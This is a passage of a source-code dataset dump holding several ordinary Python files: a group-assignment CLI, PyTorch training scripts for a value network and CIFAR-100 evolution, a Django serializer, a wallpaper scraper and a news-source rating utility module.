nela_load_labels():\n labels_df = pd.read_csv(os.path.join(DATA_RAW_PATH, \"nela\", \"labels.csv\"))\n labels_df = labels_df.rename(columns={\"Unnamed: 0\": \"Source\"})\n return labels_df\n\n\ndef nela_load_media_bias_monitor():\n with open(\"../data/raw/nela_sources_alt.json\", \"r\") as infile:\n data = json.load(infile)\n return data\n\n\ndef nela_labels_gtsource(labels_df, gt_source):\n \"\"\" only return label columns from specified ground truth source \"\"\"\n return labels_df[GT_COLS[gt_source]]\n\n\ndef load_dataset(cache_path):\n with open(\"../data/cache/\" + cache_path, \"rb\") as infile:\n obj = pickle.load(infile)\n return obj\n\n\ndef load_selection_dataset(name):\n # return pd.read_csv(\"../data/cache/\" + name)\n return pd.read_pickle(\"../data/cache/\" + name)\n\n\ndef 
load_fold_divisions_dataset(selection_tag=\"\", bias=True):\n if bias:\n with open(f\"../data/cache/{selection_tag}folds_selection.json\", 'r') as infile:\n folds = json.load(infile)\n else:\n print(f\"../data/cache/{selection_tag}reliability_folds_selection.json\")\n with open(f\"../data/cache/{selection_tag}reliability_folds_selection.json\", 'r') as infile:\n folds = json.load(infile)\n return folds\n\n\ndef load_scraped_mpc():\n return pd.read_pickle(\"../data/raw/mbc_scraped.pkl\")\n\n\n# pass count of -1 for all articles from source\n# can't run on cluster\ndef nela_load_articles_from_source(source_name, count=-1):\n conn = sqlite3.connect(\"../data/raw/nela/articles.db\")\n\n count_string = \"\"\n if count != -1:\n count_string = \"limit \" + str(count)\n\n df = pd.read_sql_query(\n \"SELECT * FROM articles WHERE source='\"\n + str(source_name)\n + \"' \"\n + count_string\n + \";\",\n conn,\n )\n return df\n\n\ndef nela_count_articles_from_source(source_name):\n conn = sqlite3.connect(\"../data/raw/nela/articles.db\")\n df = pd.read_sql_query(\n \"SELECT COUNT(*) FROM articles WHERE source='\" + str(source_name) + \"';\", conn\n )\n return df\n\n\ndef stack_dfs(df1, df2):\n \"\"\" Appends df2 to the end of df1, but assigns df2 to df1 if df1 is None \"\"\"\n if df1 is None:\n df1 = df2\n else:\n df1 = df1.append(df2, ignore_index=True)\n\n return df1\n\n\ndef clean_newlines(content):\n content = re.sub(\"(\\r\\n)+\", \" \", str(content))\n return content\n\n\ndef clean_symbols(content):\n content = re.sub(r'[\\!\"#$%&\\*+,-./:;<=>?@^_`()|~=]', \"\", content)\n return content\n\n\ndef check_output_necessary(output_path, overwrite):\n \"\"\"Determine whether a step is necessary by checking for its existence/overwrite combo.\n\n Returns true if should continue with step, false if can skip.\n \"\"\"\n\n logging.debug(\"Checking for existence of '%s'...\", output_path)\n\n if os.path.exists(output_path):\n logging.debug(\"Output found.\")\n logging.info(\"Cached version found.\")\n\n # check if should overwite the existing output or not\n if overwrite:\n logging.debug(\"Overwrite requested, continuing...\")\n logging.warning(\"Overwriting an existing output '%s'!\", output_path)\n return True\n\n logging.debug(\"No overwrite requested, skip step...\")\n return False\n\n # if this point hit, the file doesn't exist yet\n return True\n\n\ndef init_logging(log_path=None):\n \"\"\"Sets up logging config, including associated file output.\"\"\"\n log_formatter = logging.Formatter(\n \"%(asctime)s - %(filename)s - %(levelname)s - %(message)s\"\n )\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.DEBUG)\n\n if log_path is not None:\n file_handler = logging.FileHandler(log_path)\n file_handler.setFormatter(log_formatter)\n root_logger.addHandler(file_handler)\n\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_formatter)\n root_logger.addHandler(console_handler)\n\n\ndef create_dir(path):\n try:\n os.mkdir(path)\n except:\n logging.warning(\"Did not create directory %s\", path)\n\n\ndef dump_log(func):\n \"\"\"Decorator to print function call details - parameters names and effective values.\"\"\"\n def wrapper(*args, **kwargs):\n func_args = inspect.signature(func).bind(*args, **kwargs).arguments\n func_args_str = ', '.join('{} = {!r}'.format(*item) for item in func_args.items())\n logging.info(f'CALL::{func.__module__}.{func.__qualname__}({func_args_str})')\n return func(*args, **kwargs)\n return 
wrapper\n","sub_path":"bias/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"517919203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 17 16:01:13 2020\n\n@author: Administrator\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 16 18:06:20 2020\n\n@author: Administrator\n\"\"\"\nfrom keras.models import Sequential\n#from keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\n#from keras.initializers import TruncatedNormal\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dropout\nfrom keras.layers.core import Dense\nfrom keras import backend as K\nimport keras\n#import tensorflow as tf\nimport os\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\n#import utils_paths\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import argparse\nimport random\nimport pickle\nimport cv2\nfrom keras import optimizers\nfrom keras import applications\nfrom keras.models import Sequential, Model\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nimage_types = (\".jpg\", \".jpeg\", \".png\", \".bmp\", \".tif\", \".tiff\")\n \n \ndef list_images(basePath, contains=None):\n    # return the valid image paths in the dataset\n    return list_files(basePath, validExts=image_types, contains=contains)\n\ndef list_files(basePath, validExts=None, contains=None):\n    # walk the image directory and yield the path of every image\n    for (rootDir, dirNames, filenames) in os.walk(basePath):\n        # loop over the filenames in the current directory\n        for filename in filenames:\n            # if the contains string is not none and the filename does not contain\n            # the supplied string, then ignore the file\n            if contains is not None and filename.find(contains) == -1:\n                continue\n \n            # locate the last '.' to determine the current file's extension\n            ext = filename[filename.rfind(\".\"):].lower()\n \n            # check whether the file is an image that should be processed\n            if validExts is None or ext.endswith(validExts):\n                # build the image path\n                imagePath = os.path.join(rootDir, filename)\n                yield imagePath\n\ndef loadfile():\n    # read data and labels\n    print(\"------start loading data for vgg16------\")\n    data = []\n    labels = []\n    # collect the image paths for later reading\n    imagePaths = sorted(list(list_images('./dataset/set10')))\n    random.seed(42)\n    random.shuffle(imagePaths)\n    #print(imagePaths)\n    # read the data\n    for imagePath in imagePaths:\n        # read the image\n        image = cv2.imread(imagePath)\n        image = cv2.resize(image, (64, 64))\n        data.append(image)\n        # read the label (parent directory name)\n        label = imagePath.split(os.path.sep)[-2]\n        labels.append(label)\n    # scale the pixel values\n    data = np.array(data, dtype=\"float\") / 255.0\n    labels = np.array(labels)\n    # train/test split\n    (trainX, testX, trainY, testY) = train_test_split(data,labels, test_size=0.20, random_state=42)\n    #print(trainX.shape,testX.shape,trainY.shape,testY.shape)\n    # convert labels to one-hot encoding\n    lb = LabelBinarizer()\n    trainY = lb.fit_transform(trainY) # mainly useful for multi-class labels\n    testY = lb.transform(testY)\n    #\n    trainY = keras.utils.to_categorical(trainY,2)\n    testY = keras.utils.to_categorical(testY,2)\n    return trainX, testX, trainY, testY,lb\nclass SimpleVGGNet:\n    @staticmethod\n    def build(width, height, depth, classes):\n#        model = Sequential()\n        inputShape = (height, width, depth)\n#        chanDim = -1\n\n        if K.image_data_format() == \"channels_first\":\n            inputShape = (depth, height, width)\n#            chanDim = 1\n#        model.add(Conv2D(64, (3, 3), padding=\"same\",\n#            input_shape=inputShape))\n\n        base_model = applications.VGG16(weights=\"imagenet\", include_top=False,\n                                        input_shape=inputShape)  # pretrained VGG16; the top layers are replaced\n        print('base_model',base_model.summary())\n        \n        for layer in base_model.layers[:15]: layer.trainable = False  # freeze the first 15 pretrained layers\n        \n        top_model = Sequential()  # custom top network\n        top_model.add(Flatten(input_shape=base_model.output_shape[1:]))  # flatten the pretrained network's output\n        top_model.add(Dense(2, activation='relu'))  # fully connected layer\n        top_model.add(Dropout(0.5))  # dropout with probability 0.5\n        top_model.add(Dense(classes, activation='softmax'))  # output layer, binary classification\n        print('top_model',top_model.summary())\n        model = Model(inputs=base_model.input, outputs=top_model(base_model.output))\n        return model\nif __name__ == '__main__':\n    trainX, testX, trainY, testY,lb=loadfile()\n    print(trainX.shape,testX.shape,trainY.shape,testY.shape,lb)\n#    np.save('Train-img_data',trainX)\n#    np.save('Train-img_label',trainY)\n#    np.save('Test-img_data',testX)\n#    np.save('Test-img_label',testY)\n#    print('ok')\n#    trainX = np.load('Train-img_data.npy')\n#    testX=np.load('Train-img_label.npy')\n#    trainY=np.load('Test-img_data.npy')\n#    testY=np.load('Test-img_label.npy')\n#    print(testY)\n    aug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n        height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n        horizontal_flip=True, fill_mode=\"nearest\")\n## build the convolutional network\n    model = SimpleVGGNet.build(width=64, height=64, depth=3,classes=len(lb.classes_))\n#    # set the initial hyperparameters\n    INIT_LR = 0.01\n    EPOCHS = 50\n    BS = 32\n    # loss function; compile the model\n    print(\"------preparing to train the network------\")\n    opt = SGD(lr=INIT_LR, decay=INIT_LR / EPOCHS)\n    model.compile(loss=\"categorical_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\n    model.summary()  # show the model\n\n    H = model.fit(trainX, trainY, validation_data=(testX, testY),\n        epochs=EPOCHS, batch_size=32)\n#    \"\"\"\n\n#    # test\n    print(\"------testing the VGG16 network------\")\n    predictions = model.predict(testX, batch_size=32)\n    print(classification_report(testY.argmax(axis=1),\n        predictions.argmax(axis=1), target_names=lb.classes_))\n#    \n#    # plot the result curves\n    N = np.arange(0, EPOCHS)\n    plt.style.use(\"ggplot\")\n    plt.figure()\n    plt.plot(N, H.history[\"loss\"], label=\"train_loss\")\n    plt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\n    plt.plot(N, H.history[\"accuracy\"], label=\"train_acc\")\n    plt.plot(N, H.history[\"val_accuracy\"], label=\"val_acc\")\n    plt.title(\"Training Loss and Accuracy\")\n    plt.xlabel(\"Epoch #\")\n    plt.ylabel(\"Loss/Accuracy\")\n    plt.legend()\n    plt.savefig('./output/vgg16.png')\n    #\n    # save the model\n    print(\"------saving the model------\")\n    model.save('./output/vgg16.h5')\n    f = open('./output/vgg16.pickle', \"wb\")\n    f.write(pickle.dumps(lb))\n    f.close()","sub_path":"qianyi/qy_vgg16.py","file_name":"qy_vgg16.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"508223384","text":"from rest_framework import permissions, status, generics\nfrom rest_framework.response import Response\n\nfrom members.permissions import IsUserOrReadOnly\nfrom ..models import UserToMovie, Movie\nfrom ..serializers import UserToMovieBasicSerializer\n\n\n__all__ = (\n    'UserCheckedMovieCreateView',\n)\n\n\nclass UserCheckedMovieCreateView(generics.CreateAPIView):\n    permission_classes = (\n        permissions.IsAuthenticated,\n        IsUserOrReadOnly,\n    )\n    queryset = UserToMovie.objects.all()\n    serializer_class = UserToMovieBasicSerializer\n\n    def create(self, request, *args, **kwargs):\n        request.data['user'] = request.user.pk\n        serializer = self.get_serializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        serializer.save()\n        Movie.objects.update_rating_avg(id=self.request.data['movie'])\n        headers = self.get_success_headers(serializer.data)\n        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n","sub_path":"app/movie/apis/user_to_movie_create.py","file_name":"user_to_movie_create.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"566799967","text":"import pygame\nimport sys\nimport math\nimport os\nfrom pygame.locals import *\n\nclass Flag:\n    # flag coordinates\n    \"\"\"\n    Flag\n    Attributes:\n        hitBox: tuple\n        score: list\n    Methods:\n        update(player, screen, bg): draws the flag and updates its position\n    \"\"\"\n    hitBox = (6349, 67, 6, 290)\n    score = [0]\n    def __init__(self):\n        \"\"\"initialize the flag\"\"\"\n        self.image = pygame.transform.scale(pygame.image.load(os.path.join(\"img\", \"flag.png\")), (40, 32))\n        self.rect = self.image.get_rect()\n        self.y = 317\n        self.x = 6352\n        self.change_y = 0\n    \n    def update(self, player, screen, bg):\n        \"\"\" draws the flag and updates its position\"\"\"\n        screen.blit(self.image, (self.x + bg.bgX, self.y))\n        hitBox = pygame.Rect(self.hitBox)\n        player_hitBox = pygame.Rect((abs(bg.bgX) + player.x, player.y, 32, 32))\n        if hitBox.colliderect(player_hitBox): # if the player touches the pole, the flag slides down\n            self.score.append(player.y)\n            while self.y >= player.y:\n                self.y -= 0.5\n    ","sub_path":"classes/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"86899736","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport warnings\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union\n\nfrom google.api_core import gapic_v1\nfrom google.api_core import grpc_helpers_async\nfrom google.api_core import operations_v1\nfrom google.auth import credentials as ga_credentials  # type: ignore\nfrom google.auth.transport.grpc import SslCredentials  # type: ignore\n\nimport grpc  # type: ignore\nfrom grpc.experimental import aio  # type: ignore\n\nfrom google.cloud.bigtable_admin_v2.types import bigtable_table_admin\nfrom google.cloud.bigtable_admin_v2.types import table\nfrom google.cloud.bigtable_admin_v2.types import table as gba_table\nfrom google.iam.v1 import iam_policy_pb2  # type: ignore\nfrom google.iam.v1 import policy_pb2  # type: ignore\nfrom google.longrunning import operations_pb2  # type: ignore\nfrom google.protobuf import empty_pb2  # type: ignore\nfrom .base import BigtableTableAdminTransport, DEFAULT_CLIENT_INFO\nfrom .grpc import BigtableTableAdminGrpcTransport\n\n\nclass BigtableTableAdminGrpcAsyncIOTransport(BigtableTableAdminTransport):\n    \"\"\"gRPC 
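The qianyi/qy_vgg16.py record above wires a partially frozen VGG16 base to a small dense head. A minimal sketch of that transfer-learning pattern, written against the tensorflow.keras namespace rather than the record's standalone keras imports; the 64x64 input, 15 frozen layers, and two-class softmax head mirror the record, while the 256-unit Dense layer is an assumption for illustration:

from tensorflow.keras import applications, layers, models

def build_transfer_model(input_shape=(64, 64, 3), num_classes=2, frozen_layers=15):
    # pretrained convolutional base without its classifier
    base = applications.VGG16(weights="imagenet", include_top=False,
                              input_shape=input_shape)
    for layer in base.layers[:frozen_layers]:   # keep the early conv blocks fixed
        layer.trainable = False
    x = layers.Flatten()(base.output)
    x = layers.Dense(256, activation="relu")(x)
    x = layers.Dropout(0.5)(x)
    out = layers.Dense(num_classes, activation="softmax")(x)
    return models.Model(inputs=base.input, outputs=out)

model = build_transfer_model()
model.compile(optimizer="sgd", loss="categorical_crossentropy", metrics=["accuracy"])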
{"seq_id":"86899736","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport warnings\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union\n\nfrom google.api_core import gapic_v1\nfrom google.api_core import grpc_helpers_async\nfrom google.api_core import operations_v1\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\n\nimport grpc # type: ignore\nfrom grpc.experimental import aio # type: ignore\n\nfrom google.cloud.bigtable_admin_v2.types import bigtable_table_admin\nfrom google.cloud.bigtable_admin_v2.types import table\nfrom google.cloud.bigtable_admin_v2.types import table as gba_table\nfrom google.iam.v1 import iam_policy_pb2 # type: ignore\nfrom google.iam.v1 import policy_pb2 # type: ignore\nfrom google.longrunning import operations_pb2 # type: ignore\nfrom google.protobuf import empty_pb2 # type: ignore\nfrom .base import BigtableTableAdminTransport, DEFAULT_CLIENT_INFO\nfrom .grpc import BigtableTableAdminGrpcTransport\n\n\nclass BigtableTableAdminGrpcAsyncIOTransport(BigtableTableAdminTransport):\n \"\"\"gRPC AsyncIO backend transport for BigtableTableAdmin.\n\n Service for creating, configuring, and deleting Cloud\n Bigtable tables.\n\n Provides access to the table schemas only, not the data stored\n within the tables.\n\n This class defines the same methods as the primary client, so the\n primary client can load the underlying transport implementation\n and call it.\n\n It sends protocol buffers over the wire using gRPC (which is built on\n top of HTTP/2); the ``grpcio`` package must be installed.\n \"\"\"\n\n _grpc_channel: aio.Channel\n _stubs: Dict[str, Callable] = {}\n\n @classmethod\n def create_channel(\n cls,\n host: str = \"bigtableadmin.googleapis.com\",\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n quota_project_id: Optional[str] = None,\n **kwargs,\n ) -> aio.Channel:\n \"\"\"Create and return a gRPC AsyncIO channel object.\n Args:\n host (Optional[str]): The host for the channel to use.\n credentials (Optional[~.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is ignored if ``channel`` is provided.\n scopes (Optional[Sequence[str]]): An optional list of scopes needed for this\n service. These are only used when credentials are not specified and\n are passed to :func:`google.auth.default`.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n kwargs (Optional[dict]): Keyword arguments, which are passed to the\n channel creation.\n Returns:\n aio.Channel: A gRPC AsyncIO channel object.\n \"\"\"\n\n return grpc_helpers_async.create_channel(\n host,\n credentials=credentials,\n credentials_file=credentials_file,\n quota_project_id=quota_project_id,\n default_scopes=cls.AUTH_SCOPES,\n scopes=scopes,\n default_host=cls.DEFAULT_HOST,\n **kwargs,\n )\n\n def __init__(\n self,\n *,\n host: str = \"bigtableadmin.googleapis.com\",\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n channel: Optional[aio.Channel] = None,\n api_mtls_endpoint: Optional[str] = None,\n client_cert_source: Optional[Callable[[], Tuple[bytes, bytes]]] = None,\n ssl_channel_credentials: Optional[grpc.ChannelCredentials] = None,\n client_cert_source_for_mtls: Optional[Callable[[], Tuple[bytes, bytes]]] = None,\n quota_project_id: Optional[str] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n always_use_jwt_access: Optional[bool] = False,\n api_audience: Optional[str] = None,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]):\n The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. 
These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is ignored if ``channel`` is provided.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is ignored if ``channel`` is provided.\n scopes (Optional[Sequence[str]]): An optional list of scopes needed for this\n service. These are only used when credentials are not specified and\n are passed to :func:`google.auth.default`.\n channel (Optional[aio.Channel]): A ``Channel`` instance through\n which to make calls.\n api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.\n If provided, it overrides the ``host`` argument and tries to create\n a mutual TLS channel with client SSL credentials from\n ``client_cert_source`` or application default SSL credentials.\n client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):\n Deprecated. A callback to provide client SSL certificate bytes and\n private key bytes, both in PEM format. It is ignored if\n ``api_mtls_endpoint`` is None.\n ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials\n for the grpc channel. It is ignored if ``channel`` is provided.\n client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):\n A callback to provide client certificate bytes and private key bytes,\n both in PEM format. It is used to configure a mutual TLS channel. It is\n ignored if ``channel`` or ``ssl_channel_credentials`` is provided.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. 
If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n always_use_jwt_access (Optional[bool]): Whether self signed JWT should\n be used for service account credentials.\n\n Raises:\n google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n creation failed for any reason.\n google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``\n and ``credentials_file`` are passed.\n \"\"\"\n self._grpc_channel = None\n self._ssl_channel_credentials = ssl_channel_credentials\n self._stubs: Dict[str, Callable] = {}\n self._operations_client: Optional[operations_v1.OperationsAsyncClient] = None\n\n if api_mtls_endpoint:\n warnings.warn(\"api_mtls_endpoint is deprecated\", DeprecationWarning)\n if client_cert_source:\n warnings.warn(\"client_cert_source is deprecated\", DeprecationWarning)\n\n if channel:\n # Ignore credentials if a channel was passed.\n credentials = False\n # If a channel was explicitly provided, set it.\n self._grpc_channel = channel\n self._ssl_channel_credentials = None\n else:\n if api_mtls_endpoint:\n host = api_mtls_endpoint\n\n # Create SSL credentials with client_cert_source or application\n # default SSL credentials.\n if client_cert_source:\n cert, key = client_cert_source()\n self._ssl_channel_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n else:\n self._ssl_channel_credentials = SslCredentials().ssl_credentials\n\n else:\n if client_cert_source_for_mtls and not ssl_channel_credentials:\n cert, key = client_cert_source_for_mtls()\n self._ssl_channel_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n\n # The base transport sets the host, credentials and scopes\n super().__init__(\n host=host,\n credentials=credentials,\n credentials_file=credentials_file,\n scopes=scopes,\n quota_project_id=quota_project_id,\n client_info=client_info,\n always_use_jwt_access=always_use_jwt_access,\n api_audience=api_audience,\n )\n\n if not self._grpc_channel:\n self._grpc_channel = type(self).create_channel(\n self._host,\n # use the credentials which are saved\n credentials=self._credentials,\n # Set ``credentials_file`` to ``None`` here as\n # the credentials that we saved earlier should be used.\n credentials_file=None,\n scopes=self._scopes,\n ssl_credentials=self._ssl_channel_credentials,\n quota_project_id=quota_project_id,\n options=[\n (\"grpc.max_send_message_length\", -1),\n (\"grpc.max_receive_message_length\", -1),\n ],\n )\n\n # Wrap messages. 
This must be done after self._grpc_channel exists\n self._prep_wrapped_messages(client_info)\n\n @property\n def grpc_channel(self) -> aio.Channel:\n \"\"\"Create the channel designed to connect to this service.\n\n This property caches on the instance; repeated calls return\n the same channel.\n \"\"\"\n # Return the channel from cache.\n return self._grpc_channel\n\n @property\n def operations_client(self) -> operations_v1.OperationsAsyncClient:\n \"\"\"Create the client designed to process long-running operations.\n\n This property caches on the instance; repeated calls return the same\n client.\n \"\"\"\n # Quick check: Only create a new client if we do not already have one.\n if self._operations_client is None:\n self._operations_client = operations_v1.OperationsAsyncClient(\n self.grpc_channel\n )\n\n # Return the client from cache.\n return self._operations_client\n\n @property\n def create_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateTableRequest], Awaitable[gba_table.Table]\n ]:\n r\"\"\"Return a callable for the create table method over gRPC.\n\n Creates a new table in the specified instance.\n The table can be created with a full set of initial\n column families, specified in the request.\n\n Returns:\n Callable[[~.CreateTableRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_table\" not in self._stubs:\n self._stubs[\"create_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateTable\",\n request_serializer=bigtable_table_admin.CreateTableRequest.serialize,\n response_deserializer=gba_table.Table.deserialize,\n )\n return self._stubs[\"create_table\"]\n\n @property\n def create_table_from_snapshot(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateTableFromSnapshotRequest],\n Awaitable[operations_pb2.Operation],\n ]:\n r\"\"\"Return a callable for the create table from snapshot method over gRPC.\n\n Creates a new table from the specified snapshot. The\n target table must not exist. The snapshot and the table\n must be in the same instance.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. 
It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.CreateTableFromSnapshotRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_table_from_snapshot\" not in self._stubs:\n self._stubs[\"create_table_from_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateTableFromSnapshot\",\n request_serializer=bigtable_table_admin.CreateTableFromSnapshotRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_table_from_snapshot\"]\n\n @property\n def list_tables(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListTablesRequest],\n Awaitable[bigtable_table_admin.ListTablesResponse],\n ]:\n r\"\"\"Return a callable for the list tables method over gRPC.\n\n Lists all tables served from a specified instance.\n\n Returns:\n Callable[[~.ListTablesRequest],\n Awaitable[~.ListTablesResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_tables\" not in self._stubs:\n self._stubs[\"list_tables\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListTables\",\n request_serializer=bigtable_table_admin.ListTablesRequest.serialize,\n response_deserializer=bigtable_table_admin.ListTablesResponse.deserialize,\n )\n return self._stubs[\"list_tables\"]\n\n @property\n def get_table(\n self,\n ) -> Callable[[bigtable_table_admin.GetTableRequest], Awaitable[table.Table]]:\n r\"\"\"Return a callable for the get table method over gRPC.\n\n Gets metadata information about the specified table.\n\n Returns:\n Callable[[~.GetTableRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_table\" not in self._stubs:\n self._stubs[\"get_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetTable\",\n request_serializer=bigtable_table_admin.GetTableRequest.serialize,\n response_deserializer=table.Table.deserialize,\n )\n return self._stubs[\"get_table\"]\n\n @property\n def update_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.UpdateTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the update table method over gRPC.\n\n Updates a specified table.\n\n Returns:\n Callable[[~.UpdateTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_table\" not in self._stubs:\n self._stubs[\"update_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UpdateTable\",\n 
request_serializer=bigtable_table_admin.UpdateTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"update_table\"]\n\n @property\n def delete_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteTableRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete table method over gRPC.\n\n Permanently deletes a specified table and all of its\n data.\n\n Returns:\n Callable[[~.DeleteTableRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_table\" not in self._stubs:\n self._stubs[\"delete_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteTable\",\n request_serializer=bigtable_table_admin.DeleteTableRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_table\"]\n\n @property\n def undelete_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.UndeleteTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the undelete table method over gRPC.\n\n Restores a specified table which was accidentally\n deleted.\n\n Returns:\n Callable[[~.UndeleteTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"undelete_table\" not in 